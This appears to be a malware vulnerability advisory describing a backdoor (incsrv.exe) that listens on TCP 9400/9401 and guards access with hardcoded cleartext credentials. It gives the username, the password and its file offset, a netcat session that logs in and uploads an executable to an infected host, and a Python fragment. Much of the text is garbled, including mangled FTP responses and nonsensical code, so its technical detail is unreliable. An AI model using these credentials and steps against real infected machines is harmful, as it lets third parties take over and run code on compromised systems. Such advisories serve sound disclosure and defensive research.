Credits: Malvuln (John Page, aka Hyp3rlinx), Discovery (c) 2022
Original source: https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txt
Contact: [email protected]
Backup media: infosec.exchange/@malvuln
Vulnerability: Cleartext Credentials in Hardcoded Cleartext
Vuln ID: MVID-2022 – 0665
Files dropped: incsrv.exe
Description: This malware listens to TCP ports 9400 and 9401, and needs authentication. The username IncUserb3 is saved in cleartext under Windows dir in the file “incsrv.drv”. The password “InClientMainPassword” is also stored in cleartext but within the PE file “incsrv.exe” at offset 000958d0.
Third-party adversaries can then upload their executables via ftp PASV or STOR commands.
C:>nc64.exe 192.168.18.125 9401
Ready to use 220 InCommad FTP Server
USER IncUser – b3
For IncUser-b3., you will need a 331 password
Log in as 230 User IncUserb3.
215 UNIX Type: L8 Internet Component Suite
227 Entering Passive Mode (192,168,18,125,241,155).
Successful 250 CWD Command Current directory is “C:/”.
150 Open data connection to DOOM_SM.exe
226 File received OK
From socket import
f = open (DOOM, “rb”)
EXE = F.read()
While EXE is:
Disclaimer: This advisory information is provided “as-is,” without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit to the author. Author is not responsible or liable for misuse or misappropriation of information. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. Copyright for all content (c) Malvuln.comTM